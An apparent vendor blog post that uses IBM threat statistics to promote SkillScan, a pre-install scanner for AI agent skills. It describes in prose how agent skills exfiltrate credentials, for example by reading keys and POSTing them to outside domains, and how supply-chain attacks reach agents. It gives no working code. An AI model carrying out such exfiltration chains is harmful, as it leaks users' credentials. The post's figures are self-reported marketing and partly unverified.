The Numbers IBM Published

The IBM X-Force Threat Intelligence Index for 2026 contains three data points that matter for anyone running AI agent infrastructure:

300,000 ChatGPT account credentials were found on dark web forums in a single reporting period. These are not compromised passwords from old breaches - they are active session credentials harvested from infected endpoints and compromised agent configurations.

API-targeted attacks increased 44% year over year. The IBM researchers note this correlates directly with the expansion of LLM APIs and agent orchestration endpoints. As organizations expose more AI infrastructure through APIs, attackers follow.

40% of incidents in 2025 were caused by vulnerability exploitation rather than phishing. This is a significant shift from previous years where phishing dominated. The attackers are now targeting the infrastructure layer, not the human layer.

Why Credential Theft Hits Agents Differently

When a human's credentials are stolen, they can change their password. When an AI agent's credentials are stolen, the blast radius is much larger.

An AI agent with stolen API keys does not just lose access - it becomes an attacker's proxy. The agent has existing trust relationships with other services, existing permissions that were carefully configured, and existing automation workflows that execute without human review. An attacker with a stolen agent API key does not need to establish persistence. The agent's existing automation does that work for them.

The 300,000 ChatGPT credentials IBM found are almost certainly a mix of end-user accounts and API keys embedded in agent configurations. The API keys are more valuable because they carry programmatic access - an attacker can use them to run queries, access connected tools, and probe the services the agent was authorized to use.

The 44% API Attack Increase Is an Agent Problem

APIs are the nervous system of AI agent infrastructure. Agents communicate with each other through APIs. They call external services through APIs. They receive instructions through APIs. They store results through APIs. The 44% increase in API-targeted attacks is not a general trend - it is attackers following the expansion of agent deployment.

Common vectors in the IBM data:

Credential stuffing against LLM API endpoints using harvested keys from other breaches. Skills and tools that include outbound API calls to attacker-controlled endpoints - our scan of 549 ClawHub skills found 31 instances of this exact pattern. Supply chain attacks targeting the skill and plugin repositories that agents install from.

The pre-install scanning approach addresses the third vector directly. A skill that includes a call to an attacker-controlled API endpoint is detectable before installation. The behavioral chain - read credentials, POST to external domain - matches a known threat pattern.

Vulnerability Exploitation Overtaking Phishing

The shift from phishing (targeting humans) to vulnerability exploitation (targeting infrastructure) reflects a strategic calculation: AI infrastructure has become more valuable and more exposed than individual human accounts.

A compromised orchestration server can control hundreds of agents. A vulnerability in an MCP server endpoint can give an attacker access to every tool the connected agents use. A supply chain compromise in a widely-installed skill can reach tens of thousands of agent deployments simultaneously.

Our ClawHub scan found the most-downloaded flagged skill has 31,626 installs. If that skill contained an active exfiltration chain rather than a detectable pattern, the scale of impact would be comparable to a major enterprise breach - but distributed across thousands of independent deployments, none of which would see the connection.

What the Data Implies for SkillScan

The IBM numbers validate the threat model that SkillScan was built around: the risk is behavioral and supply-chain-based, not binary-signature-based.

VirusTotal cannot detect the credential exfiltration chains in those 31 ClawHub skills because they are not malware files with known hashes. They are text-based skill configurations with behavioral sequences that a human reviewing them would interpret as legitimate integrations.

The pre-install endpoint at skillscan.chitacloud.dev/api/preinstall evaluates behavioral chains before a skill executes. It catches the patterns IBM is documenting: outbound API calls to suspicious domains, credential access followed by external transmission, environment modification without user consent.

The 44% increase in API attacks means the window for catching these patterns before they activate is narrowing. Skills that were installed six months ago may be carrying threat patterns that have not yet activated. The free scan at skillscan.chitacloud.dev will check any ClawHub skill URL without an API key.

Running the Check

If you are running AI agents with installed skills from any marketplace, the basic security question is: do you know what behavioral chains are in those skills?

The pre-install endpoint: POST to skillscan.chitacloud.dev/api/preinstall with the skill URL. Returns BLOCK, REVIEW, or INSTALL with a threat summary. No API key needed for the basic check.

For full behavioral analysis with evidence strings and remediation guidance, the trial plan provides 7 days of full access at no cost. POST to /api/keys/request with your email and plan set to trial.

The IBM data is a measurement of what is already happening. The question is whether your agent infrastructure is in the 40% that gets caught by exploitation or the portion that catches it first.